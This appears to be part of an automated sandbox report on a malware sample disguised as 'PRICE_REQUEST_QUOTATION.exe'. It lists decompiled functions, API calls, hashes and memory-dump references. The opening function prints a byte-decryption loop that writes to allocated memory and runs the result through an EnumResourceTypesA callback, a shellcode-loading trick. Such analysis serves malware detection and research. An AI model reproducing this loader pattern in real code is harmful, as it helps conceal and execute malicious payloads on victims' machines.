						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) - 0xb2;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) + 0x5a;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 =  !(_v5 & 0x000000ff);
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ 0x000000d5;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 = _v5 & 0x000000ff ^ 0x0000004e;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - 0x7e;
						_v5 =  !(_v5 & 0x000000ff);
						 *((char*)(E7333A000 + _v12)) = _v5;
						_v12 = _v12 + 1;
					}
					_t119 = EnumResourceTypesA(0, E7333A000, 0); // executed
					return _t119;
				}
				return _t116;
			}

0x73337500
0x73337506
0x7333751b
0x73337521
0x73337528
0x73337537
0x7333753f
0x73337546
0x73337558
0x73337568
0x7333756e
0x73337577
0x73337581
0x7333758b
0x73337594
0x7333759e
0x733375a7
0x733375b1
0x733375bb
0x733375c4
0x733375ce
0x733375d7
0x733375e1
0x733375eb
0x733375f5
0x73337608
0x73337611
0x7333761b
0x73337625
0x7333762f
0x73337638
0x73337642
0x7333764f
0x73337659
0x73337663
0x7333766c
0x73337675
0x7333767e
0x73337688
0x73337691
0x7333769b
0x733376a8
0x733376b2
0x733376bb
0x733376c5
0x733376d7
0x733376e1
0x733376ea
0x733376f3
0x733376fd
0x73337706
0x7333770f
0x73337555
0x73337555
0x73337723
0x00000000
0x73337723
0x7333772c

APIs

VirtualAlloc.KERNELBASE(00000000,0BEBC200,00003000,00000004), ref: 7333751B
EnumResourceTypesA.KERNEL32 ref: 73337723

Memory Dump Source

Source File: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocEnumResourceTypesVirtual
String ID:
API String ID: 1791965044-0
Opcode ID: cae52a40d90159ea98e5f9178861ae7aba8192c4be010e1d6b39f00b015be915
Instruction ID: d28db088a579ca826fff4a08610aadf7d9380ab954838a8c9eb6e85dcf67b67a
Opcode Fuzzy Hash: cae52a40d90159ea98e5f9178861ae7aba8192c4be010e1d6b39f00b015be915
Instruction Fuzzy Hash: AA717824C4D3DCA9DF16C7F984607ECBFB55E6B102F0881CAE4D566286C57A138EDB21

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x42ec50; // 0x6c143c
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42e40c =  *0x42e40c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e40c, 0x7530,  *0x42e3f4), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x00401392
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32 ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
Instruction ID: 74927b77398f0d82d02f0f32bcc48ccf03ca760f88dcf9e2e40121dab22ba05a
Opcode Fuzzy Hash: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
Instruction Fuzzy Hash: 4901F431B242209BE7195B399C09B6A3698E710328F10863BF851F72F1D678DC039B4D

Uniqueness

Uniqueness Score: -1.00%

Function 00405F57, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F57(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409208);
				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
				}
				_t5 = E00405EE9(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00405f5f
0x00405f62
0x00405f69
0x00405f71
0x00405f7d
0x00000000
0x00405f84
0x00405f74
0x00405f7b
0x00000000
0x00405f8c
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
GetProcAddress.KERNEL32(00000000,?), ref: 00405F84

Part of subcall function 00405EE9: GetSystemDirectoryA.KERNEL32 ref: 00405F00
Part of subcall function 00405EE9: wsprintfA.USER32 ref: 00405F39
Part of subcall function 00405EE9: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
Instruction ID: bbbe084413d2e6f7ef046b623ea8b92179420db3b6db08e2e7fdeef9d7d4980c
Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
Instruction Fuzzy Hash: 5DE08C32B08A12BAD6109B719D0497B72ACDEC8640300097EF955F6282D738AC11AAA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040589E, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040589E(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x004058a2
0x004058af
0x004058c4
0x004058ca

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe,80000000,00000003), ref: 004058A2
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16

Uniqueness

Uniqueness Score: -1.00%

Function 0040587F, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040587F(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}

0x00405883
0x0040588c
0x00000000
0x00405895
0x0040589b

APIs

GetFileAttributesA.KERNELBASE(?,0040568A,?,?,?), ref: 00405883
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405895

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
Instruction ID: cb5a672fe6ba1e8618a417a0682e77d28f0f111bf9a29bd8adb2d3f05be15d2c
Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
Instruction Fuzzy Hash: FDC04C71C08501ABD6016B34EF0DC5F7B66EB50322B14CB35F469A01F0C7315C66DA2A

Uniqueness

Uniqueness Score: -1.00%

Function 004053F2, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004053F2(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x004053f8
0x00405400
0x00000000
0x00405406
0x00000000

APIs

CreateDirectoryA.KERNELBASE(?,00000000,0040311D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004053F8
GetLastError.KERNEL32 ref: 00405406

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
Instruction ID: 813393d6953da14087893f37eb662e151031eda4d181b9a341b076b840c4c01a
Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
Instruction Fuzzy Hash: 27C04C30619502DAD7105B31DD08B5B7E50AB50742F219535A506E11E1D6349492D93E

Uniqueness

Uniqueness Score: -1.00%

Function 004030B0, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004030B0(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x004030b4
0x004030c7
0x004030cf
0x00000000
0x004030d6
0x00000000
0x004030d8

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDD,000000FF,00000004,00000000,00000000,00000000), ref: 004030C7

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
Instruction ID: 90557e19d7482b95f4dd5f96256efcc3496d5940ec1e4df6b8622c0cc682be59
Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
Instruction Fuzzy Hash: A1E08C32201118BBCF205E519D00AA73B9CEB043A2F008032BA18E51A0D630EA11ABA9

Uniqueness

Uniqueness Score: -1.00%

Function 004030E2, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004030E2(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}

0x004030f0
0x004030f6

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,000087E4), ref: 004030F0

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E

Uniqueness

Uniqueness Score: -1.00%

Function 004056E5, Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056E5(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}

0x004056e5
0x004056f8
0x004056f8
0x004056fc
0x00000000
0x00000000
0x004056ef
0x004056f2
0x00000000
0x004056f2
0x00000000
0x004056ef
0x004056fe

APIs

CharNextA.USER32(?,00403215,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,00409168), ref: 004056F2

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: b78f2958c7f68e19d57b7ad513a89c73604121592eb64134f43146a97932e323
Instruction ID: d90016124225ae7065af0310e7167278304a7e66743f3b900cadaec09162e188
Opcode Fuzzy Hash: b78f2958c7f68e19d57b7ad513a89c73604121592eb64134f43146a97932e323
Instruction Fuzzy Hash: D3C08024C0D74567C550471041244677FE4AA61350F944C96F0C863170C5366C409F2A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404FF1, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404FF1(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x42e404; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F85, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405BE9(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x42a0a0;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42e3ec - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42ec28, 8);
							__eflags =  *0x42ecac - _t149; // 0x0
							if(__eflags == 0) {
								E00404EB3( *((intOrPtr*)( *0x429870 + 0x34)), _t149);
							}
							E00403E5C(1);
							goto L25;
						}
						 *0x429468 = 2;
						E00403E5C(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403EEA(_a8, _a12, _a16);
						}
						ShowWindow( *0x42e3f0, _t149);
						ShowWindow(_t154, 8);
						E00403EB8(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x42ec30; // 0x6c0230
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x42e3f0 = GetDlgItem(_a4, 0x403);
				 *0x42e3e8 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x42e404 = _t127;
				_v8 = _t127;
				E00403EB8( *0x42e3f0);
				 *0x42e3f4 = E00404755(4);
				 *0x42e40c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E83(_a4);
				if(( *0x42ec38 & 0x00000003) != 0) {
					ShowWindow( *0x42e3f0, _t149);
					if(( *0x42ec38 & 0x00000002) != 0) {
						 *0x42e3f0 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403EB8( *0x42e3e8);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x42ec38 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

0x00404ffa
0x00405000
0x00405009
0x0040500c
0x0040519d
0x004051a4
0x004051c8
0x004051c8
0x004051ce
0x004051db
0x004051f9
0x004051f9
0x00405200
0x00405257
0x00405257
0x0040525b
0x00000000
0x00000000
0x0040525d
0x00405260
0x00000000
0x00000000
0x0040526a
0x00405270
0x00405272
0x00405275
0x0040536e
0x00000000
0x0040536e
0x00405284
0x00405290
0x00405296
0x00405299
0x0040529c
0x004052b1
0x004052b4
0x004052b4
0x004052b7
0x0040529e
0x004052a3
0x004052a9
0x004052ac
0x004052ac
0x004052c7
0x004052cf
0x004052d0
0x004052d2
0x004052db
0x004052de
0x004052e5
0x004052ec
0x004052f4
0x004052f4
0x00405302
0x00405308
0x0040530b
0x0040530b
0x00405312
0x00405318
0x00405321
0x00405328
0x00405331
0x00405333
0x00405336
0x00405345
0x00405347
0x0040534d
0x0040534e
0x0040534f
0x0040534f
0x00405357
0x00405362
0x00405368
0x00405368
0x00000000
0x004052d2
0x00405202
0x00405208
0x00405238
0x0040523a
0x00405240
0x0040524b
0x0040524b
0x00405252
0x00000000
0x00405252
0x0040520c
0x00405216
0x00000000
0x004051dd
0x004051dd
0x004051e3
0x0040521b
0x00000000
0x00405224
0x004051ec
0x004051f1
0x004051f4
0x00000000
0x004051f4
0x004051db
0x00405012
0x00405016
0x0040501f
0x00405026
0x00405029
0x0040502c
0x0040502f
0x00405030
0x00405031
0x0040504a
0x0040504d
0x00405057
0x00405066
0x0040506e
0x00405076
0x0040507b
0x0040507e
0x0040508a
0x00405093
0x0040509c
0x004050bf
0x004050c5
0x004050d6
0x004050db
0x004050e9
0x004050f7
0x004050f7
0x004050fc
0x0040510a
0x0040510a
0x0040510f
0x00405112
0x00405117
0x00405123
0x0040512c
0x00405139
0x00405148
0x0040513b
0x00405140
0x00405140
0x00405154
0x00405154
0x00405168
0x00405171
0x0040517a
0x0040518a
0x00405196
0x00405196
0x00000000

APIs

GetDlgItem.USER32 ref: 00405050
GetDlgItem.USER32 ref: 0040505F
GetClientRect.USER32 ref: 0040509C
GetSystemMetrics.USER32 ref: 004050A4
SendMessageA.USER32 ref: 004050C5
SendMessageA.USER32 ref: 004050D6
SendMessageA.USER32 ref: 004050E9
SendMessageA.USER32 ref: 004050F7
SendMessageA.USER32 ref: 0040510A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040512C
ShowWindow.USER32(?,00000008), ref: 00405140
GetDlgItem.USER32 ref: 00405161
SendMessageA.USER32 ref: 00405171
SendMessageA.USER32 ref: 0040518A
SendMessageA.USER32 ref: 00405196
GetDlgItem.USER32 ref: 0040506E

Part of subcall function 00403EB8: SendMessageA.USER32 ref: 00403EC6

GetDlgItem.USER32 ref: 004051B3
CreateThread.KERNEL32 ref: 004051C1
CloseHandle.KERNEL32(00000000), ref: 004051C8
ShowWindow.USER32(00000000), ref: 004051EC
ShowWindow.USER32(00000000,00000008), ref: 004051F1
ShowWindow.USER32(00000008), ref: 00405238
SendMessageA.USER32 ref: 0040526A
CreatePopupMenu.USER32 ref: 0040527B
AppendMenuA.USER32 ref: 00405290
GetWindowRect.USER32 ref: 004052A3
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052C7
SendMessageA.USER32 ref: 00405302
OpenClipboard.USER32(00000000), ref: 00405312
EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405318
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405321
GlobalLock.KERNEL32 ref: 0040532B
SendMessageA.USER32 ref: 0040533F
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405357
SetClipboardData.USER32 ref: 00405362
CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 00405368

Strings

{, xrefs: 00405257

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
Instruction ID: 14fcdc656e1060cfbb0aff817b75222918c1b3830be54c9a3b8aebe23af76a49
